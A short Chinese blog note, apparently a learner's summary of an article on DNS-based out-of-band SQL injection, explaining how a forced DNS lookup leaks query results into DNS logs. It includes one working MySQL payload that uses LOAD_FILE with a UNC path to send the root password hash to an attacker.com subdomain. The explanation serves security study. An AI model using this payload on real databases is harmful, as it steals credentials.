這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。
本文章是理解於:http://netsecurity.51cto.com/art/201503/469621.htm
鏈接中的文章主要說的是什么?
先愉快的介紹了DNS工作原理,注意其中有一個術語叫做遞歸。這個是DNS服務關鍵的一部分。
這種攻擊方式需要提前能查看DNS日志,利用SQL注入語句返回信息,迫使DNS遞歸,然后DNS日志的記錄。
日志中就有SQL注入返回信息了。
例如:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
返回了:\\\\返回值(password).attacker.com\\foobar。觸發了DNS遞歸,導致日志記錄。